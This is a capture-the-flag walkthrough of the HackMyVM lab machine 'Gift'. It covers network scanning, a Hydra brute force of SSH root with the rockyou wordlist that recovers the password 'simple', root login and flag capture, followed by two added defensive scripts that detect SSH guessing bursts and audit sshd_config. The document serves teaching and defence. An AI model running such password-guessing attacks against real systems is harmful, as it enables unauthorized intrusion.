Write-up Gift on HackMyVM
A gift, who doesn't love that? I think everyone likes to receive a gift from time to time. There is an easy machine on HackMyVM called Gift, and the name is what caught my attention. Is there an online store where you have to hack something with SQL injection via gifts?
Getting started
To work neatly, we create a working directory before we start our attack.
┌──(emvee㉿kali)-[~]
└─$ cd Documents/HMV/
┌──(emvee㉿kali)-[~/Documents/HMV]
└─$ mkdir Gift
┌──(emvee㉿kali)-[~/Documents/HMV]
└─$ cd Gift
We should also note our own IP address, so we can tell our own host apart from the target later.
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:0e:ca:e6 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
valid_lft 485sec preferred_lft 485sec
inet6 fe80::a00:27ff:fe0e:cae6/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:16:8c:e3:ab brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
Enumeration
Now we're really going to start! First we enumerate the (virtual) network in which our target is located. We can do this with fping.
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ fping -ag 10.0.2.0/24 2> /dev/null
10.0.2.1
10.0.2.2
10.0.2.3
10.0.2.9
10.0.2.15
Once we have found the target's IP address, we assign it to a variable called ip. This makes the commands that follow easier to type.
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ ip=10.0.2.9
First, let's find out which ports are open and which services are running. We do this with nmap across all ports. (-A already implies -sC, -sV and -O, so the command below is slightly redundant, but harmless.)
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ sudo nmap -sC -sV -T4 -A -O -p- $ip
[sudo] password for emvee:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 07:51 CEST
Nmap scan report for 10.0.2.9
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
| 256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_ 256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open http nginx
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:14:23:D4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.49 ms 10.0.2.9
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
Only ports 22 and 80 are open. Usually port 22 is not interesting to attack right away. Let's update our notes.
- Linux, distribution not yet known
- Port 22
  - SSH
  - OpenSSH 8.3
- Port 80
  - HTTP
  - nginx
  - Title: site doesn't have a title (text/html)
Because port 80 is the most interesting, it makes sense to look into this further first. With whatweb we can get an idea of what technology was used.
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ whatweb http://$ip
http://10.0.2.9 [200 OK] Country[RESERVED][ZZ], HTTPServer[nginx], IP[10.0.2.9], nginx
Unfortunately, that doesn't make us much wiser. Maybe Nikto can find something, although I'm not really convinced at the moment.
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ nikto -h http://$ip
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.0.2.9
+ Target Hostname: 10.0.2.9
+ Target Port: 80
+ Start Time: 2023-09-12 07:52:52 (GMT2)
---------------------------------------------------------------------------
+ Server: nginx
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2023-09-12 07:53:14 (GMT2) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto did find something: a #wp-config.php# file that may contain credentials. Let's inspect it.
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ curl http://$ip/#wp-config.php#
Dont Overthink. Really, Its simple.
<!-- Trust me -->
Okay, I didn't expect this. One caveat before moving on: the # in that URL starts a URL fragment, and curl never sends the fragment to the server, so what we are really looking at is whatever nginx serves for / (to request the literal path you would percent-encode it as /%23wp-config.php%23). Either way the hint points the same direction: with nothing more on the website and port 22 open, a brute force attack on SSH is still an option. We can use Hydra for this with the username root and rockyou as the dictionary.
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ hydra ssh://$ip -l root -P /usr/share/wordlists/rockyou.txt -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-12 07:55:35
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://10.0.2.9:22/
[STATUS] 374.00 tries/min, 374 tries in 00:01h, 14344061 to do in 639:14h, 28 active
[22][ssh] host: 10.0.2.9 login: root password: simple
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 23 final worker threads did not complete until end.
[ERROR] 23 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-12 07:56:47
Hydra has found a valid pair of credentials. The warning about parallel tasks is worth taking seriously: sshd caps the number of concurrent unauthenticated connections (MaxStartups, 10:30:100 by default), so with -t 64 many of the tasks are simply refused, which is why Hydra complains about targets that "could not be connected" and writes a restore file. With -t 4 the run is slower but cleaner. Let's add the credentials to our notes and log in.
root:simple
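From the defender's side, a run like the one above is loud: every guess lands in sshd's auth log as a "Failed password" line, and the one that matters is the "Accepted password" from the same source right after the burst. The following is an added example, not part of the original write-up, that counts failures per source address over such log lines and flags any source that exceeds a threshold, noting whether it eventually got in. The log lines are constructed here to resemble what a Hydra run leaves behind; they are not taken from the Gift machine.

```shell
#!/bin/sh
# Added example (not from the write-up): detect an SSH password-guessing
# burst, and whether it succeeded, from sshd auth-log lines.

# Usage: ssh_bruteforce_report <logfile> [threshold]
# Prints "<ip> <failed-count> then-accepted|no-success" for every source
# with more than <threshold> (default 10) "Failed password" events,
# most failures first. The source address is the field after "from".
ssh_bruteforce_report() {
  awk -v limit="${2:-10}" '
    function src(    i) {
      for (i = 1; i <= NF; i++) if ($i == "from") return $(i + 1)
      return "?"
    }
    # sshd logs "Failed password for root" and, for unknown accounts,
    # "Failed password for invalid user <name>"; both match here.
    /sshd\[[0-9]+\]: Failed password for / { fails[src()]++ }
    /sshd\[[0-9]+\]: Accepted (password|publickey) for / { ok[src()]++ }
    END {
      for (ip in fails)
        if (fails[ip] > limit)
          print ip, fails[ip], ((ip in ok) ? "then-accepted" : "no-success")
    }
  ' "$1" | sort -k2 -nr
}

# Constructed sample log: two benign events, one stray failed guess from
# 10.0.2.3, a 40-attempt burst against root from 10.0.2.15, and finally a
# successful password login from that same source.
SAMPLE_LOG=$(mktemp)
{
  printf 'Sep 12 07:55:35 gift sshd[1201]: Accepted publickey for deploy from 10.0.2.1 port 50122 ssh2\n'
  printf 'Sep 12 07:55:36 gift sshd[1203]: Failed password for invalid user admin from 10.0.2.3 port 50130 ssh2\n'
  i=0
  while [ "$i" -lt 40 ]; do
    printf 'Sep 12 07:55:%02d gift sshd[%d]: Failed password for root from 10.0.2.15 port %d ssh2\n' \
      $((37 + i % 20)) $((1300 + i)) $((41000 + i))
    i=$((i + 1))
  done
  printf 'Sep 12 07:56:47 gift sshd[1400]: Accepted password for root from 10.0.2.15 port 41090 ssh2\n'
} > "$SAMPLE_LOG"

# Only 10.0.2.15 crosses the threshold, and it did get in.
ssh_bruteforce_report "$SAMPLE_LOG" 10
```

The "then-accepted" marker is the signal to act on: many failures from one address is noise on any Internet-facing host, but a success from an address that was just guessing is a compromised account until proven otherwise.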
Initial access
Time to log in as root via the SSH service.
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ ssh root@$ip
The authenticity of host '10.0.2.9 (10.0.2.9)' can't be established.
ED25519 key fingerprint is SHA256:dXsAE5SaInFUaPinoxhcuNloPhb2/x2JhoGVdcF8Y6I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.2.9' (ED25519) to the list of known hosts.
root@10.0.2.9's password:
IM AN SSH SERVER
gift:~#
Once we are logged in, we check who we are and which machine we have landed on.
gift:~# whoami;id;hostname;ip a;pwd
root
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
gift
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 08:00:27:14:23:d4 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.9/24 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe14:23d4/64 scope link
valid_lft forever preferred_lft forever
/root
gift:~#
We are really root, without any privilege escalation: the whole machine fell to a root account that accepts passwords over SSH and uses one that is in rockyou. We can now capture both flags.
gift:~# ls
root.txt user.txt
gift:~# cat user.txt
<-- Here is the USER flag -->
gift:~# cat root.txt
<-- Here is the ROOT flag -->
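The root cause of this box is configuration, not a software bug: sshd let root authenticate with a password, and the password was weak. Below is an added example, not from the write-up, of a small sshd_config audit that flags the settings which make an online guessing attack like the one above possible, run against two configs constructed here (a weak one and its hardened counterpart; neither is Gift's real configuration). The check honours sshd's rule that the first occurrence of a keyword wins and ignores Match blocks, so treat it as a first pass, not a substitute for sshd -T.

```shell
#!/bin/sh
# Added example (not from the write-up): audit sshd_config for the settings
# that let a root password be guessed online.

# Effective value of a keyword: sshd takes the FIRST occurrence and ignores
# later duplicates; keywords are case-insensitive; commented lines do not count.
# Usage: sshd_effective <config> <keyword> <compiled-in default>
sshd_effective() {
  v=$(grep -iE "^[[:space:]]*$2[[:space:]]+" "$1" | head -n1 | awk '{print tolower($2)}')
  printf '%s' "${v:-$3}"
}

# Print one finding per weak setting; return 1 if anything was flagged.
# Defaults below are OpenSSH 7.0+ defaults: prohibit-password, yes, 6.
audit_sshd() {
  cfg="$1"; rc=0
  case "$(sshd_effective "$cfg" PermitRootLogin prohibit-password)" in
    yes) echo "PermitRootLogin yes: root can authenticate with a password; set prohibit-password or no"; rc=1 ;;
  esac
  case "$(sshd_effective "$cfg" PasswordAuthentication yes)" in
    yes) echo "PasswordAuthentication yes: passwords can be guessed online; prefer keys and set no"; rc=1 ;;
  esac
  tries=$(sshd_effective "$cfg" MaxAuthTries 6)
  if [ "$tries" -gt 3 ] 2>/dev/null; then
    echo "MaxAuthTries $tries: allows $tries guesses per connection; 3 is plenty for interactive use"; rc=1
  fi
  return $rc
}

# Constructed weak config: the kind of settings that let root:simple work.
WEAK_CFG=$(mktemp)
cat > "$WEAK_CFG" <<'EOF'
# constructed for the example, not taken from the Gift machine
Port 22
#PermitRootLogin prohibit-password
PermitRootLogin yes
PasswordAuthentication yes
Banner /etc/issue.net
EOF

# Constructed hardened counterpart: keys only, no root, fewer tries.
HARD_CFG=$(mktemp)
cat > "$HARD_CFG" <<'EOF'
# constructed for the example
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
EOF

echo "== weak config =="
audit_sshd "$WEAK_CFG" || true
echo "== hardened config =="
audit_sshd "$HARD_CFG" && echo "no findings"
```

Note that the weak config never sets MaxAuthTries, so the audit flags the compiled-in default of 6; the commented-out PermitRootLogin line is correctly ignored and the live "yes" is what gets reported.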